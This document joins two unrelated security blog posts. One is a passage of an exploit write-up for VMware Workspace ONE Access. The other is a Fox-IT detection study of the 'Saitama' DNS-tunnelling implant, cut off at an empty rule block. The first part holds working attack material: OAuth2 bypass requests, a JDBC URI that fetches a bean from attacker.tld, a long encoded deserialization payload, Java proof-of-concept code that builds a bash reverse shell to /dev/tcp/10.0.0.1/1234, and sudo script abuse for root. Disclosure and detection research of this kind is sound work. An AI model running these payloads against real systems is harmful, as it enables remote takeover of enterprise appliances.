/*  77 */         assureAuthenticatedApiAdmin(); // 2
/*     */       }
/*  79 */     } catch (Exception e) {
/*  80 */       log.info("Check for existing organization threw an exception.", driverVersion);
/*     */     }
/*     */
/*     */     try {
/*  84 */       String encryptedPwd = configEncrypter.encrypt(dbPassword);
/*  85 */       driverVersion = this.dbConnectionCheckService.checkConnection(jdbcUrl, dbUsername, encryptedPwd); // 3
/*  86 */     } catch (PersistenceRuntimeException e) {
/*  87 */       throw new MyOneLoginException(HttpStatus.NOT_ACCEPTABLE.value(), e.getMessage(), e);
/*     */     }
/*  89 */     return new RESTResponse(Boolean.valueOf(true), Integer.valueOf(HttpStatus.OK.value()), driverVersion, null);
/*     */   }


At [1] the code checks whether there are any existing organizations (there will be, if it's set up correctly) and at [2] the code validates that an admin is requesting the endpoint. At [3] the code calls DbConnectionCheckServiceImpl.checkConnection with the attacker-controlled jdbcUrl.

/*  73 */   public String checkConnection(String jdbcUrl, String username, String password) throws PersistenceRuntimeException { return checkConnection(jdbcUrl, username, password, true); }
/*     */   public String checkConnection(@Nonnull String jdbcUrl, @Nonnull String username, @Nonnull String password, boolean checkCreateTableAccess) throws PersistenceRuntimeException {
/*  87 */     connection = null;
/*  88 */     String driverVersion = null;
/*     */     //...
/*     */     connection = testConnection(jdbcUrl, username, password, checkCreateTableAccess); // 4
/*     */     try {
/*  92 */       meta = connection.getMetaData();
/*  93 */       driverVersion = meta.getDriverVersion();
/*  94 */     } catch (SQLException e) {
/*  95 */       log.error("connectionFailed");
/*  96 */       throw new PersistenceRuntimeException(e.getMessage(), e);
/*     */     } finally {
/*     */       try {
/*  99 */         if (connection != null) {
/* 100 */           connection.close();
/*     */         }
/* 102 */       } catch (Exception e) {
/* 103 */         log.warn("Problem closing connection", e);
/*     */       }
/*     */     }
/* 106 */     return driverVersion;
/*     */   }


The code calls DbConnectionCheckServiceImpl.testConnection at [4] with an attacker controlled jdbcUrl string.

/*     */   private Connection testConnection(String jdbcUrl, String username, String password, boolean checkCreateTableAccess) throws PersistenceRuntimeException {
/*     */     try {
/*     */
/*     */       Connection connection = this.factoryHelper.getConnection(jdbcUrl, username, password); // 5
/* 127 */       log.info("sql verification triggered");
/* 128 */       this.factoryHelper.sqlVerification(connection, username, Boolean.valueOf(checkCreateTableAccess));
/*     */
/* 130 */       if (checkCreateTableAccess) {
/* 131 */         return testCreateTableAccess(jdbcUrl, connection);
/*     */       }
/*     */
/* 134 */       return testUpdateTableAccess(connection);
/*     */     }


The code calls FactoryHelper.getConnection at [5].

/*     */     public Connection getConnection(String jdbcUrl, String username, String password) throws SQLException {
/*     */       try {
/*     */         //...
/*     */         return DriverManager.getConnection(jdbcUrl, username, password); // 6
/* 428 */       } catch (Exception ex) {
/* 429 */         if (ex.getCause() != null && ex.getCause().toString().contains("javax.net.ssl.SSLHandshakeException")) {
/* 430 */           log.info(String.format("ssl handshake failed for the user:%s ", new Object[] { username }));
/* 431 */           throw new SQLException("database.connection.ssl.notSuccess");
/*     */         }
/* 433 */         log.info(String.format("Connection failed for the user:%s ", new Object[] { username }));
/* 434 */         throw new SQLException("database.connection.notSuccess");
/*     */       }
/*     */     }


Finally, at [6] the attacker can reach a DriverManager.getConnection sink, which leads to an arbitrary JDBC URI connection. Given the flexibility of JDBC, the attacker can use any of the drivers deployed within the application. This vulnerability can lead to remote code execution as the horizon user, as discussed in the exploitation section.

## publishCaCert and gatherConfig Privilege Escalation

After gaining remote code execution as the horizon user, we can exploit the following vulnerability to gain root access. This section contains two bugs, but I decided to report it as a single vulnerability due to the way I (ab)used them in the final exploit chain.

1. The publishCaCert.hzn script allows attackers to disclose sensitive files.
2. The gatherConfig.hzn script allows attackers to take ownership of sensitive files

These scripts can be executed by the horizon user with root privileges without a password using sudo. They were not writable by the horizon user so I audited the scripts for logical issues to escalate cleanly.

1. publishCaCert.hzn:

For this bug, we can see that the script takes a file on the command line, copies it to /etc/ssl/certs/ at [1] and then makes it readable by everyone (and writable by the owner) at [2]!

#!/bin/sh

#Script to isolate sudo access to just publishing a single file to the trusted certs directory

CERTFILE=$1
DESTFILE=$(basename $2)
cp -f $CERTFILE /etc/ssl/certs/$DESTFILE # 1
chmod 644 /etc/ssl/certs/$DESTFILE # 2
c_rehash > /dev/null

2. gatherConfig.hzn:

For taking ownership, we can use a symlink called debugConfig.txt and point it to a root owned file at [1].

#!/bin/bash
#
. /usr/local/horizon/scripts/hzn-bin.inc
. /usr/local/horizon/scripts/manageTcCfg.inc
DEBUG_FILE=$1
#...
function gatherConfig() {
  printLines
  echo "1) cat /usr/local/horizon/conf/flags/sysconfig.hostname" >${DEBUG_FILE}
  #...
  chown $TOMCAT_USER:$TOMCAT_GROUP $DEBUG_FILE # 1
}
if [ -z "$DEBUG_FILE" ]
then
  usage
else
  DEBUG_FILE=${DEBUG_FILE}/"debugConfig.txt"
  gatherConfig
fi

## Exploitation

### OAuth2TokenResourceController ACS Authentication Bypass

1. First, we can grab the activationToken.

Request:

POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1
Host: photon-machine
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response:

{
  "activationToken": "eyJvdGEiOiJiNmRlZmFkOS1iY2M3LTM3ZWUtYTdkZi05YTM2ZDcxZDU4MGE6c0dJcnlObEhxREVnUW...",
  "_links": {}
}

2. Now, with the activation token, let's get the client_id and client_secret.

Request:

POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1
Host: photon-machine
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

eyJvdGEiOiJiNmRlZmFkOS1iY2M3LTM3ZWUtYTdkZi05YTM2ZDcxZDU4MGE6c0dJcnlObEhxREVnUW...

Response:

{
  "client_id": "Service__OAuth2Client",
  "client_secret": "uYkAzg1woC1qbCa3Qqd0i6UXpwa1q00o"
}

From this point, exploitation is just the standard OAuth2 flow to grab a signed JWT.

### DBConnectionCheckController dbCheck JDBC Injection Remote Code Execution

Technique 1 - Remote code execution via the MySQL JDBC Driver autoDeserialize

It was also possible to perform remote code execution via the MySQL JDBC driver by using the autoDeserialize property. The server would connect back to the attacker's malicious MySQL server, which could deliver an arbitrary serialized Java object to be deserialized on the server. As it turns out, the off-the-shelf ysoserial CommonsBeanutils1 gadget worked a treat: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 <cmd>. This technique was first presented by Yang Zhang, Keyi Li, Yongtao Wang and Kunzhe Chai at Blackhat Europe in 2019. This was the technique I used in the exploit I sent to VMWare, because I wanted to hint at their usage of unsafe libraries that contain off-the-shelf gadget chains!
Technique 2 - Remote code execution via the PostgreSQL JDBC Driver socketFactory

It was possible to perform remote code execution via the socketFactory property of the PostgreSQL JDBC driver. By setting the socketFactory and socketFactoryArg properties, an attacker can trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Since the application was using Spring with a Postgres database, it was the perfect candidate to (ab)use FileSystemXmlApplicationContext!

Proof of Concept:

jdbc:postgresql://si/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.tld:9090/bean.xml

But of course, we can improve on this. Inspired by RicterZ, let's say you want to exploit the bug without internet access. You can re-use the com.vmware.licensecheck.LicenseChecker class VMWare provides us and mix deserialization with the PostgreSQL JDBC driver attack. Let's walk from one of the LicenseChecker constructors right to the vulnerable sink.

public LicenseChecker(final String s) {
    this(s, true); // 1
}

public LicenseChecker(final String state, final boolean validateExpiration) {
    this._handle = new LicenseHandle();
    if (state != null) {
        this._handle.setState(state); // 2
    }
    this._validateExpiration = validateExpiration;
}

At [1] the code calls another constructor in the same class with the passed-in string.
At [2] the code calls setState on the LicenseHandle class:

public void setState(String var1) {
    if (var1 != null && var1.length() >= 1) {
        try {
            byte[] var2 = MyBase64.decode(var1); // 3
            if (var2 != null && this.deserialize(var2)) { // 4
                this._state = var1;
                this._isDirty = false;
            }
        } catch (Exception var3) {
            log.debug(new Object[]{"failed to decode state: " + var3.getMessage()});
        }
    }
}

At [3] the code base64-decodes the string and at [4] it then calls deserialize:

private boolean deserialize(byte[] var1) {
    if (var1 == null) {
        return true;
    } else {
        try {
            ByteArrayInputStream var2 = new ByteArrayInputStream(var1);
            DataInputStream var3 = new DataInputStream(var2);
            int var4 = var3.readInt();
            switch(var4) {
                case -889267490:
                    return this.deserialize_v2(var3); // 5
                default:
                    log.debug(new Object[]{"bad magic: " + var4});
            }
        } catch (Exception var5) {
            log.debug(new Object[]{"failed to de-serialize handle: " + var5.getMessage()});
        }
        return false;
    }
}

You can probably see where this is going already. At [5] the code calls deserialize_v2 if the supplied int is -889267490:

private boolean deserialize_v2(DataInputStream var1) throws IOException {
    byte[] var2 = Encrypt.readByteArray(var1);
    if (var2 == null) {
        log.debug(new Object[]{"failed to read cipherText"});
        return false;
    } else {
        try {
            byte[] var3 = Encrypt.decrypt(var2, new String(keyBytes_v2)); // 6
            if (var3 == null) {
                log.debug(new Object[]{"failed to decrypt state data"});
                return false;
            } else {
                ByteArrayInputStream var4 = new ByteArrayInputStream(var3);
                ObjectInputStream var5 = new ObjectInputStream(var4);
                this._htEvalStart = (Hashtable)var5.readObject(); // 7
                log.debug(new Object[]{"restored " + this._htEvalStart.size() + " entries from state info"});
                return true;
            }
        } catch (Exception var6) {
            log.warn(new Object[]{var6.getMessage()});
            return false;
        }
    }
}

At [6] the code calls decrypt, decrypting the data using a hardcoded key. Then at [7] the code calls readObject on the attacker-supplied data.
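As an aside, the framing that deserialize() expects at [5] can be modelled in a few lines. Java's DataInputStream.readInt reads a big-endian int32, so the decoded blob must begin with the magic value -889267490 for deserialize_v2 to be reached:

```python
import struct

MAGIC = -889267490  # the magic int checked by deserialize()

def frame_state(cipher_text: bytes) -> bytes:
    # struct '>i' mirrors Java's DataInputStream.readInt: a big-endian
    # signed 32-bit integer, followed here by the encrypted payload.
    return struct.pack(">i", MAGIC) + cipher_text

blob = frame_state(b"encrypted-payload-here")
assert struct.unpack(">i", blob[:4])[0] == MAGIC
```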
At this point we could supply our deserialization gadget right into the jdbc uri string, removing any outgoing connection requirement! Here is a proof of concept to execute the command touch /tmp/pwn: jdbc:postgresql://si/saas?socketFactory=com.vmware.licensecheck.LicenseChecker%26socketFactoryArg=yv7a3gAACwQAAAAIUhcrRObG2UIAAAAQoz1rm0A08QaIZG2jKm3PvgAACuBO%252Bkf56P3LYUtlxM%252Fd9BtAjxDOFJAiL9KmHfk1p01I544KCUNyVi2UpONDLJHejQCbZi20R8JW3zg879309FDfjSabzvJ2PxvJafQqei8egUOn32BJngdb1r0jwJ8rrxsheJQc3BXJny6pma9pHciqmjJUioTfyKousm%252Fk8YiId8nFu0IX2yQS3GkvV%252FUHCz06KusffoQatuTOL465%252BChdQG88W9FGawgr7Pc9TzZTDZoy%252Bel83sU9hFqcW0oaDgQGtvsVjovnL71fsbQ2ik4C0p8lKxgGRamJmZKl5UvrWpgbOoi5ueTPvr2RgsvyrYno%252Bg3EghzuYjfgdG5owEIPAbHY39mgsjnFR5VZlJR6xmeEkadeGYfvhv%252FU9X57N6a3jmUvCpd50a96GQawp%252BmnfNx5hvp7z%252BjKuSecJ9ruTClM7P9XnU0hspHYgPIXk085Vhdh0P%252BECl%252F7pAAq0rZVEittj43DZhRDbvjqnEbd%252FvueXUK3e0Ld7PZ5oZa055dPxI7uw9FPYMEGnq6WLjFAyZT13QrnITd7uESJE82ZCgDLT7V81UHv3E9DPFPsryRITA9wAu4EycM4aGlh%252FcJzmxKCG%252Fcrt9FvzeQd4SGxhOK7i2I%252B4OUy8mjKgDh4dajVM8cVEogVqnyPWCP7ZYJsPrUlx2F6lhGo53%252BuBQzMzu2IerBZRVeE43CsxfBW1073y8FRYxX8A8w%252BaGikZUcanJ6T%252FfW0z7ENfTTXJYzt%252BNaEsZo5Q2FTeOgzg9%252BLE9d64w7P4SZ5HjIl4xnji2KjUZ2%252FGzzRhSxbsy3EyHvWJurBaNx1mOuYReexqHe7Va1mKjJHizU88T9kn6IVc8yCO9npFl%252Bh4uLAiruwHCC0YZK4O%252F%252BmfOb%252Fb3WescghMkp2s%252FxMe4bfjeomQWqzobztKry32vWM%252BovpDJHbOlTANviW50AzaXCVjGF10Ch86XAsHyiEpb44CzaMSWXV%252BfnQFw%252FRgY9uhv%252FUoUtxZs%252FmOpzSxgywFUNGaC1%252FoMXWmqJ5pne2fO2tH3EYyLhBIbK4GpTY5vzC8yRqYAyVW6LgkK%252FLZerScwc49NjWLZXMYOr9bsH2Ed2TEoy5sYUnMPmN19%252FZQqYWO2N1UaCV1D7F9V3z6fKRuhq0EyNj5RvXg%252BdUz%252FBuUzoju7Rbky1dYg3mQr4AbX94bi%252FLK5mdWlPcavJJlmBJGpxClGQmE%252BxpW2WVrQtAOGJrlcC0oTJSbe8ynPWoXbhqW3uXsNU2r5a2axQgNJfQDGomgtViDeqARbMrAoicMHIUH%252B1GDv9tLwaKMcBJC48ENoUrUfaFn68S9pFesqvjzvMB0Q%252BLmiXF9pfO02fVG5FWuMwouEYANrbnbL7MiPqoGPTwS6547LJh%252BScQ4dYc1Ga%252Bqfxh0NCXSfeetVdY7w7rilctRpe%252Fgchj6Q7SAK2%252BcX%252B0qlozTXdBhYvCOgWoX
f5OYelsPJp%252BYPylKJyKC4v1fPskeZic8SA5EPKBQGmcwP09BmwD6J7t9GFMyvnxgl1Zlr5EggDqT7QXW0RhH4e%252FM7Jjhp4D%252F%252F1y8nfEfM23MqrRSZ%252B33P5xMXrbA7SgUbaC8fFlma85xpcaS1VBvs4%252FvUNs5Wsl9D2hAsiiBFu3vQiGXJVsB7KmV8Vuh2shiD8Akq5R2%252F3oSb1t%252BLm0ZcIP4MYLtvGkyfBXj81C3KKKNta4tZTpZW7MfeiXo%252FMoorn06fxlh7elFoPYLZ5eA7DB0jwBtUJ1Ay4xNgL24DnQlIwWkTrZJvdIzs0zTvFv3yYvgq4CaNwDDBbGdYufSRULnI8BAJgedXQqVkV9a3W4nK%252FYCMyczUZ%252FI2Nsslf4zqb3s1RJltGAPsHoR7YjKC1iZG1b%252BYGSN%252FyCW6RZJGxESArr3a1pcNndQUIzabKjIotYOFtMdrAdF9xXKNcMYN8qdFhAJ6PUkS%252FRuu%252F7YxM9xzpN9%252Br4JuuwnO8P6n4l9mib8J6ElX1GXw5Tc7MpdVcW%252BUqkKRLICuh1H5f53E8MO4ESJ2Ku56xvNZyJ0Ai2LDzumgORDeVJa4BLrUgeRkTZqOkYdRWHXrFTTP9HFgXobAQqj75nRkpFEQMEzbKSjdQAU%252B%252Bq2730wMh5LuVRui7HUPnvUCZDpkgDr9GDMGJitt%252FU6RtHqQmYB%252B%252FpFLr7m3g1tazYHvEyrQjBKdhv2FfijNtYaskJqkqPx3uRMSy%252F5l6wmQQlwbOTGXlAdUtVfKpO537dXFOofuN%252BuzIAQdXaLRddhE7fFhhrMwQXuj1jCDi70d%252FWBsy6lHxephuN5ANcl3IuGhx4MV0XRbZpt4MpGqJ2eZM18UCyk%252Fg4a%252Bgp0eRQWgA3KPJ9pZJiGk8EBFBeqsu2Y%252BIcVjGLKzghcdPpsBt3ef1TKUO0DZbS2RLMvA1dtq1vxGYuAIMHJ%252BxREAwSywn7ON9RqrF56hS91rlYJfBjPC%252FSurUVD98wa9WjqygmVsiI78QzExmrAmstUz5WsvLFl%252BoYKR%252FRLKYtjihNvFaSPYkbRNJ1GzKL0ZOXMyDJ3KcPeSkJa13vbJqmBO1JAuG8sfuRXjmaYNWdXI%252Bb%252Bkhs4V5o9IYnehTZgj4LHS7idmBjbWskldTDZHxofnnGKZenTPzbfsCzDKaGg5evEO6qpk%252FegKKK6ORyfxulQB0%252B5wzl0Z1TW3eLuRzi8jeo%252Fx3OOqgbLIqnfWFFfhezTnSYYBJdVEC4hwRksjZ9AReieEKYeZyqb1Hybg4w3q1H2I16iH4ku5R%252FCJnZBHcgPRZniF1Bohq79vgyJs9MAsfTwc%252F%252BAXUBbV8DnfdxoWwzLms6cqP2Bcuu86qORtOE4K5fNMEvYAy30%252FE70zdZoNMS%252BOsb0Lbl1cuxVpuwza0herBOLDBNlPMbi90pQ7Mt6OA7VwCiUW3TsdivLEPYKBQ3q5a5R0DEScmh5Y9BGYxgwXKfACbTjXHkrCcGLwSxTvEFJ4sjTxa%252By3rgVjWTXaRy91GRfcoNouIBmY%252FDj1ilIYPRBTP23a9IdO4M%252F4R%252FLlX454wJksnuTu6sTID7G1ELvBHCyFxjMAl0meovxnI1uZ6PuWDaC5ax4WIeG2PodvqHKdRLbU0OzmD8XyjdxY4c%252F%252FJQRl85xQ8LdlgWMrTTIlWy6jf0Z2ERwc5Oi7DK5WMZD9p2b3lARlNgo0LORSenjefQkIjAqEXXLpRYTAeJXmHJiK3iCnrNO2R8QmdujTPQthLQaAnoDuHf7Mt1iWnUTuwYv9e64ndK7lZ3%252FBjb4MYssgc9P
avSz9tAP00jZXZbq%252BM2zl2AukG0IMtunNv86dO%252BlekCjSgv%252BGH7KxNa5Yb1dlvR62c2vhE8U%252Bq%252BEU7CR4Z8lfJoAYrHMcWqlerIdc44GskzJVKb4LbpLqCMQFx3Gh%252Fq%252FwuwguPLDiQCNnyta5d9QO3aoY4BkzimWshsgyJzesREag3YehFjvfUSl%252B2Ytn5J2aHZmx3tOPrh1fa6480lb%252BWC%252Bex40M4RjPXOQKxB07UWUvumml%252BYwA8jqCcwhz0n2gHUsFHq4UovgBlETV9r7uOTX6hDHO5ztgca6c1KUINt1LA2EzFd6Hedjzx5%252FjVJb8SyviMQl4SyCeyPRS8FMGkPda8oGAiPGyc99tcQg6XItDYG0XIw%252BN59tQ8Pvfx9EBM1TOcP7NGWb7LdZixcDnLDBw77kVwxJEvcGZ2sTqIG7VdZvNsGupRwLqqeLkEpQM4%253D

Note that your payload will need to double encode special characters. To generate the state string, I re-used VMware's classes:

```java
import com.vmware.licensecheck.LicenseChecker;
import com.vmware.licensecheck.LicenseHandle;
import com.vmware.licensecheck.MyBase64;
import ysoserial.payloads.ObjectPayload.Utils;
import java.lang.reflect.Field;
import java.net.URLEncoder;
import java.util.Hashtable;
import java.io.*;

public class Poc {
    public static void main(String[] args) throws Exception {
        String shell = MyBase64.encode("bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\"".getBytes());
        Object payload = Utils.makePayloadObject("CommonsBeanutils1",
                String.format("sh -c $@|sh . echo echo %s|base64 -d|bash", shell));
        LicenseChecker lc = new LicenseChecker(null);
        Field handleField = LicenseChecker.class.getDeclaredField("_handle");
        handleField.setAccessible(true);
        LicenseHandle lh = (LicenseHandle) handleField.get(lc);
        Field htEvalStartField = LicenseHandle.class.getDeclaredField("_htEvalStart");
        htEvalStartField.setAccessible(true);
        Field isDirtyField = LicenseHandle.class.getDeclaredField("_isDirty");
        isDirtyField.setAccessible(true);
        Hashtable<Integer, Object> ht = new Hashtable<Integer, Object>();
        ht.put(1337, payload);
        htEvalStartField.set(lh, ht);
        isDirtyField.set(lh, true);
        handleField.set(lc, lh);
        String encoded = URLEncoder.encode(URLEncoder.encode(lc.getState(), "UTF-8"), "UTF-8");
        System.out.println(String.format("(+) jdbc:postgresql://si/saas?socketFactory=com.vmware.licensecheck.LicenseChecker%%26socketFactoryArg=%s", encoded));
    }
}
```

I have included the licensecheck-1.1.5.jar library in the exploit directory so that the exploit can be re-built and replicated. It should be noted that the first connection to a PostgreSQL database doesn't need to be established for the attack to succeed, so an invalid host/port is perfectly fine. Details about this attack and others similar to it can be found in the excellent blog post by Xu Yuanzhen. The final point I will make about this is that the LicenseChecker class could have also been used to exploit CVE-2021-21985, since the licensecheck-1.1.5.jar library was loaded into the target vCenter process, coupled with publicly available gadget chains.

### publishCaCert and gatherConfig Privilege Escalation

This exploit was straightforward and involved overwriting the permissions of the certproxyService.sh script so that it can be modified by the horizon user.

## Proof of Concept

I built three exploits called Hekate (that's pronounced as heh-ka-teh). The first exploit leverages the MySQL JDBC driver and the second exploit leverages the PostgreSQL JDBC driver.
Both exploits target the server and client sides, requiring an outbound connection to the attacker. The third exploit leverages the PostgreSQL JDBC driver again, this time re-using the com.vmware.licensecheck.* classes and avoiding any outbound network connections to the attacker. This is the exploit that was demonstrated at Black Hat USA 2022. All three exploits can be downloaded here: https://github.com/sourceincite/hekate/.

Server-side

Client-side

All the vulnerabilities used in Hekate also impacted the cloud version of VMware Workspace ONE Access in its default configuration.

## Exposure

Using a quick favicon hash search, Shodan reveals that ~700 active hosts were vulnerable at the time of discovery. Although the exposure is limited, the systems impacted are highly critical. An attacker will be able to gain access to third-party systems, grant assertions and breach the perimeter of an enterprise network, none of which can be done with your run-of-the-mill exposed IoT device.

## Conclusion

The limitation of CVE-2020-4006 was that it required authentication and targeted port 8443. In comparison, this attack chain targets port 443, which is much more likely to be exposed externally. Additionally, no authentication is required while root access is achieved, resulting in the complete compromise of the affected appliance. Finally, it can be exploited in a variety of ways, such as client-side or server-side, without the requirement of a deserialization gadget.

## References

# Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study

11 August 2022 at 15:20

Max Groot & Ruud van Luijk

TL;DR

A malware sample dubbed 'Saitama' was recently uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordanian government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection.
As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Group's Research and Intelligence Fusion Team (RIFT) to detect DNS-tunnelling implants such as Saitama.

## Introduction

For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTPs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure. In May 2022, security firm Malwarebytes published a two-part blog1,2 about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed 'Saitama', sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries. Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCs) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set up in a variety of ways, and how this variety affects the detection engineering process. To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama.
This can be used to control the implant in a lab environment. Moreover, 'on the wire' recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implant's traffic, using a Suricata signature and behavioural detection.

## Reconstructing the Saitama traffic

The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implant's behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available. If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the "PCAP or it didn't happen" philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP. The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend to fully weaponize the implant "for the greater good", and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.

## Let's do the twist

The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attacker's perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.
For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them both to shuffle their character sets in the same way. On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key ("haruto" for the variant discussed here) and a shared initial character set ("razupgnv2w01eos4t38h7yqidxmkljc6b9f5"), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every 'twist'. To encode this counter, the implant relies on a function named '_IntToString'. This function receives an integer and a 'base string', which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal to or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable 'str', which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down. To determine the initial seed, the server has to 'invert' this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion, because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client, and thus must verify whether the inversion function calculated the correct seed.
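The encode / invert / shuffle mechanics described above can be sketched in Python. This is an illustrative reimplementation with hypothetical function names, not the implant's exact code: in particular, CPython's random.Random is also a Mersenne Twister, but its shuffle will not match Saitama's, and it is the real _IntToString's lossy rounding that forces the server's seed search.

```python
import random

CHARSET = "razupgnv2w01eos4t38h7yqidxmkljc6b9f5"  # Saitama's shared initial character set

def int_to_string(num, base=CHARSET):
    # Pick a character, prepend it, divide by the base length, repeat
    # until the number reaches zero.
    out = ""
    while num > 0:
        out = base[num % len(base)] + out
        num //= len(base)
    return out

def recover_seed(encoded, base=CHARSET):
    # Server side: invert the encoding, then verify the candidate and try
    # higher numbers until the round-trip matches, mirroring how the real
    # server compensates for the client's lossy rounding.
    candidate = 0
    for ch in encoded:
        candidate = candidate * len(base) + base.index(ch)
    while int_to_string(candidate, base) != encoded:
        candidate += 1
    return candidate

def shuffled_charset(counter, base=CHARSET):
    # Both sides seed a PRNG with the counter and shuffle the character
    # set identically; here the PRNG is CPython's, purely for illustration.
    chars = list(base)
    random.Random(counter).shuffle(chars)
    return "".join(chars)

def decode(data, counter, base=CHARSET):
    # The server substitutes shuffled-alphabet characters back into the
    # base alphabet to recover what the client sent.
    shuffled = shuffled_charset(counter, base)
    return "".join(base[shuffled.index(ch)] for ch in data)
```

As long as both ends agree on the counter, encoding with the shuffled alphabet and decoding back to the base alphabet round-trips cleanly.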
If this is not the case, the server literally tries higher numbers until the correct seed is found. Once this hurdle is cleared, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same 'language'. The server then simply substitutes the characters from the shuffled alphabet back into the 'base' alphabet to derive what data was sent by the client.

## Twist, Sleep, Send, Repeat

Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to execute commands and receive outputs more quickly, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period. The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to 'skip' the sleeping step altogether.
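The cost of these sleeps is easy to quantify. A quick simulation, assuming the uniform 40-80 second sleep described above and the 15 output bytes each query carries (per the post); exfil_time_minutes is a hypothetical helper name:

```python
import random

def exfil_time_minutes(payload_bytes, bytes_per_query=15, lo=40, hi=80, seed=0):
    # Sum a uniform random sleep for every DNS query needed to move the payload.
    rng = random.Random(seed)
    queries = -(-payload_bytes // bytes_per_query)  # ceiling division
    return sum(rng.uniform(lo, hi) for _ in range(queries)) / 60

# 663 bytes is the zlib-deflated `whoami /priv` output mentioned in the post;
# the sleeps alone account for roughly 45 minutes, before the protocol
# overhead (polling, acknowledgements) pushes the observed total past an hour.
print(round(exfil_time_minutes(663)))
```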
These sleep times and the distribution of communication hinder detection efforts, as they allow the implant to further 'blend in' with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the 'needle' that is this implant's traffic very deep in the haystack of the overall network traffic. For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy and keeping it usable. Considering Saitama's sleep times, and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the 'whoami /priv' command, which is 663 bytes once zlib-deflated, takes more than an hour to transmit from victim machine to a C2 server. The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command.

## Detection

Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose.
While 'idle' implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication 'bursts' are where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.

### Signature-based

Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule:

```
